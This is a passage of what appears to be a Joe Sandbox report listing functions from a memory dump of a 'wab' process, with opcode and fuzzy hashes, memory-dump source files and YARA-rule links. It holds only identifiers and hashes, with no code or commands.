                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: PreferredUILanguages
                                                              • API String ID: 0-1884656846
                                                              • Opcode ID: 484c8c11da50d6ae8c2664c2c2933f0f63aff6936b540e02d65b7daba0478640
                                                              • Instruction ID: f6677f327d8807d6a7041f0ebcf49be686942872f280ebc1d61ac976f3238d2c
                                                              • Opcode Fuzzy Hash: 484c8c11da50d6ae8c2664c2c2933f0f63aff6936b540e02d65b7daba0478640
                                                              • Instruction Fuzzy Hash: A6418372D01259ABDF12DED4CC40BEE77B9EF48650F1242A7E911AB250D634EE50CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2023A470 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @30
                                                              • API String ID: 0-2018888403
                                                              • Opcode ID: 4684a143524c7c830d3712b1025465bde5ca5e2651e0938dfe00a4d3fc752157
                                                              • Instruction ID: 8eb574a21f549d5b75af029f1748d7758846dfaca7b8a7c4fadd746142b2f093
                                                              • Opcode Fuzzy Hash: 4684a143524c7c830d3712b1025465bde5ca5e2651e0938dfe00a4d3fc752157
                                                              • Instruction Fuzzy Hash: F441DDB1909606CFCB01CFE8DC81B9977B5BB58364F504167D510AB2A1DB39AE20DFA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202B705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: kLsE
                                                              • API String ID: 0-3058123920
                                                              • Opcode ID: 89465b0609659ade711621faad008ae592d7474b6c71626dc7487906bb66e3d9
                                                              • Instruction ID: 6fdfcc3b9de603ec9dfe235bbd37edec4d2ab82bd9b4d88dde5ea2a106524362
                                                              • Opcode Fuzzy Hash: 89465b0609659ade711621faad008ae592d7474b6c71626dc7487906bb66e3d9
                                                              • Instruction Fuzzy Hash: 0741A97210BB6247D7129FF4CC81B653BDAAB507A4F10051BFD548B0E5CBB818A5EBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20247505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #
                                                              • API String ID: 0-1885708031
                                                              • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                              • Instruction ID: 7f95db184e7a09a96451b35d0833c454ef93a36e30b0bc0c3b1dbef0aabdfcb5
                                                              • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                              • Instruction Fuzzy Hash: 6B419C75E00626ABCB198FC4CC90BBEB7B9EB85701F50405BED55AB240DB34ED61CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2024D530 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: g0
                                                              • API String ID: 0-2196753128
                                                              • Opcode ID: 4d2d98031a56123006405d8f0b829990a8503e02b916c06aecdad048ee6aa47a
                                                              • Instruction ID: f3fd7d3ab356cdcd5c4a670a0e23a1b66192c61ca38d62c4fe646c9808e26e99
                                                              • Opcode Fuzzy Hash: 4d2d98031a56123006405d8f0b829990a8503e02b916c06aecdad048ee6aa47a
                                                              • Instruction Fuzzy Hash: 6F2123B1905A119BC711DFE89D41F0A77EDEB64654F01082BFA44D7590EB34EC24CBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20215096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Actx
                                                              • API String ID: 0-89312691
                                                              • Opcode ID: 840bc4f6f35c0a1232c48e8a5e5e7194c66a7d436bf13d213ee4fc4889bba547
                                                              • Instruction ID: d5af10a98fc39a2b7b587b02d4e13b68926abeb0b66091be589ea03fc2d715d8
                                                              • Opcode Fuzzy Hash: 840bc4f6f35c0a1232c48e8a5e5e7194c66a7d436bf13d213ee4fc4889bba547
                                                              • Instruction Fuzzy Hash: A8119A30328623DBEB154EC98C50A56E3DDEB8D364F3081ABE564CB293D676DCE08780
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2026739A Relevance: .7, Instructions: 705COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 35ade8a98d9e297f0f228a29e67feb52b6b0caecd1edd14e4af7fe9ed4685afc
                                                              • Instruction ID: 7e503bfae751cd72b2cc3f636ee4caa2e34331c6e453d893fb15bcb60b9df0a5
                                                              • Opcode Fuzzy Hash: 35ade8a98d9e297f0f228a29e67feb52b6b0caecd1edd14e4af7fe9ed4685afc
                                                              • Instruction Fuzzy Hash: 3442B371A006168FDB05CF99D880AAEB7F6FF88314B24815EE552AB351DB34ED91CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202BA118 Relevance: .6, Instructions: 591COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e623b2bc026ace2956769ab1975cec62e13fff013a6da953f38bcf97702b8c4f
                                                              • Instruction ID: 533e231e86c6a192b0e85e53bd1073cb84bd25b1a925b86f42f24087ff949f2b
                                                              • Opcode Fuzzy Hash: e623b2bc026ace2956769ab1975cec62e13fff013a6da953f38bcf97702b8c4f
                                                              • Instruction Fuzzy Hash: 7A2216706146528FDB14CFA9C890776B7F1BF04380F14849BD9D68F286D739E9A2EB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202165D0 Relevance: .4, Instructions: 383COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f5947122dc5c757f32de3dc2680f247324ea98ea607eb27f8a70c6a830588289
                                                              • Instruction ID: b8c45f510ffe61faf00ed59b739bd40fc512ee8ab53f092b0449553ddcc96661
                                                              • Opcode Fuzzy Hash: f5947122dc5c757f32de3dc2680f247324ea98ea607eb27f8a70c6a830588289
                                                              • Instruction Fuzzy Hash: 61E19D71508342CFC304CFA8C884A5AFBE1FF89318F15896EE99987352D735E959CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20208397 Relevance: .4, Instructions: 380COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 15f8a5836530854ac255513b5e4148ab38503fb86e518242f46731fa62ab54a4
                                                              • Instruction ID: a7e77e317fc71fd438d961f24d67d075ee490524084233335ffe6727cff2d34e
                                                              • Opcode Fuzzy Hash: 15f8a5836530854ac255513b5e4148ab38503fb86e518242f46731fa62ab54a4
                                                              • Instruction Fuzzy Hash: 1BD1D3716007169BCB14CFA4CC81FABB3B6BF64304F11422BF9959B690EB34E9A1CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2022F460 Relevance: .3, Instructions: 321COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1c8af19b57913d48f29f0348914c0f0a0bf36b92b5e3b4a6b14d9bc3cc2bf522
                                                              • Instruction ID: e6bfb893ab1b5eabc3045ccf95ae8c5f44491139329c891fe98d9ce48833c082
                                                              • Opcode Fuzzy Hash: 1c8af19b57913d48f29f0348914c0f0a0bf36b92b5e3b4a6b14d9bc3cc2bf522
                                                              • Instruction Fuzzy Hash: B4C13331A01A228FCB04CFD8DD90BB973E9FB44B00F15406BE951AB7A6DB389D60DB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20220535 Relevance: .3, Instructions: 300COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                              • Instruction ID: cd34beeff45d9fb585b7f9a15ee6d28a98a65bdf323edc78aa31ae880186949d
                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                              • Instruction Fuzzy Hash: 36B11531A00A469FDB11CFE4CC80BAEBBFABF48300F24415AE55197296DB34ED61DB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202390DB Relevance: .3, Instructions: 287COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9d7e2ff5115461707e3a07f181c792b4991d4167b2009172f1d0b221e3d8ee87
                                                              • Instruction ID: 264bb57413de2a3e0912042f0e553416602f564072680d0928ab95b9818737e7
                                                              • Opcode Fuzzy Hash: 9d7e2ff5115461707e3a07f181c792b4991d4167b2009172f1d0b221e3d8ee87
                                                              • Instruction Fuzzy Hash: D2A14C71900616AFEB168FE4CC82FAF77B9EF45750F014056FA00AB2A0D775AD60DBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202183C0 Relevance: .3, Instructions: 281COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6a1949ea7e34a3955f0d23facde1d052fe4833d65d9aeddd8568fdc82fa3f8cd
                                                              • Instruction ID: 15fe5c4dedb5bb4efe12687ec2c3dfc958c7f09b3bf7976b223d400041c74a1d
                                                              • Opcode Fuzzy Hash: 6a1949ea7e34a3955f0d23facde1d052fe4833d65d9aeddd8568fdc82fa3f8cd
                                                              • Instruction Fuzzy Hash: CAC156741083418FD764CF59C884BAAB7F5FF88304F40896EE98987691D774EA58CF92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2020C427 Relevance: .3, Instructions: 280COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7154e6e5140ff1a8e672bdb109dc2a72908af295d2245ee8209c4a95041b5974
                                                              • Instruction ID: d8dfd137be898fb29ef46181b656c89e343b7a52f081cd8a5d45eea1b823094d
                                                              • Opcode Fuzzy Hash: 7154e6e5140ff1a8e672bdb109dc2a72908af295d2245ee8209c4a95041b5974
                                                              • Instruction Fuzzy Hash: 6AB182B4A002658BDB24CF94CC90BA9B7B6EF54700F5085EAD50AE7241EB35EDD9CF20
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2023E5E7 Relevance: .3, Instructions: 278COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 36a7a2699021d33ff2c5cbf64f7f85c376985c85193af8c68fad382f797faa30
                                                              • Instruction ID: 87d9e9fcb5e8976fc56938a314f93d8fdac61315c5bb0d65de9d1bcf52ca201a
                                                              • Opcode Fuzzy Hash: 36a7a2699021d33ff2c5cbf64f7f85c376985c85193af8c68fad382f797faa30
                                                              • Instruction Fuzzy Hash: 44A112B1E0461A9FDB12CFD4CC45F9EBBB8AB04754F104127EA10AB2E1D778AD64CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20250185 Relevance: .3, Instructions: 276COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5e9020c693a4f543f83bea6418b80e6a65361e7e364636647e5c83c1cda92bce
                                                              • Instruction ID: cabee18cc088e7ba99dd6272bdbc83bb18bb67a8a2ec221b04fb240befad25ba
                                                              • Opcode Fuzzy Hash: 5e9020c693a4f543f83bea6418b80e6a65361e7e364636647e5c83c1cda92bce
                                                              • Instruction Fuzzy Hash: 38A1D470A016169BD718CFE5CDD1B9ABBB5FF44314F14402BEA05A7281EB38ED29CB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202E4500 Relevance: .3, Instructions: 275COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b276793040ad4033be5042d25392769a4319091865545a5be5e38c0d79879eb3
                                                              • Instruction ID: c40e098f56a888e14d78e4059c2a0a3f36c943e4276ec485286a91996f0ab169
                                                              • Opcode Fuzzy Hash: b276793040ad4033be5042d25392769a4319091865545a5be5e38c0d79879eb3
                                                              • Instruction Fuzzy Hash: A9A1A772A54612AFC705CFA5CD80B5AB7E9FF48744F81052AF5889B661C338FD20CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2022E3F0 Relevance: .3, Instructions: 261COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1233cb2b49e8d68c04cfc6f708a5dcd0570617ca63bec126233717dc350cac3c
                                                              • Instruction ID: 40608d902f579371d763c0a3d28ab64fa256a886bd43c59e824a84d5832f1b0d
                                                              • Opcode Fuzzy Hash: 1233cb2b49e8d68c04cfc6f708a5dcd0570617ca63bec126233717dc350cac3c
                                                              • Instruction Fuzzy Hash: 51911431A11A26DFDB10DFD8EC80B6977B2EF98714F11806BE904AB354E638ED21DB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20211131 Relevance: .3, Instructions: 259COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bfe0e6e67995b2cf7b9c399b4e5850489e98eb1e3c45b27d98f9914772527641
                                                              • Instruction ID: 6346500b206d9d350aa3c5419e51216beb4b78f39d0da12c4fc38754129588f6
                                                              • Opcode Fuzzy Hash: bfe0e6e67995b2cf7b9c399b4e5850489e98eb1e3c45b27d98f9914772527641
                                                              • Instruction Fuzzy Hash: 94B120716083818FD754CF68C880A1AFBE1BB88304F144A6EF999DB352D731E995CB82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20219486 Relevance: .3, Instructions: 259COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 423caa5de2afb04048d3871ff3695a35c1a044bd50684cb224bd621d51f4ddfc
                                                              • Instruction ID: 53dce6e4489214634cb978a7d4dd1050f5e1d73800207b3b1415af7ac09f822a
                                                              • Opcode Fuzzy Hash: 423caa5de2afb04048d3871ff3695a35c1a044bd50684cb224bd621d51f4ddfc
                                                              • Instruction Fuzzy Hash: 33B18DB09046069FCB06CF98CC80B99F7F6BB44354F60455BD920BB2A2DB35D9A2DF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202CB52F Relevance: .2, Instructions: 222COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                              • Instruction ID: 79361f3dc868efd2c25e902b48ebe531a3c1fb3dabbdf47b9ba17d094ae5247b
                                                              • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                              • Instruction Fuzzy Hash: 47719236A0121A9BCF15CEE4CD81BBEF7B9AF84740F56425BED00AB241E335DD658B90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2023D090 Relevance: .2, Instructions: 217COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                              • Instruction ID: 2fb219637789fdbad71a99b7191310a8347b1bcefb96ec2e360fa96dafa8add6
                                                              • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
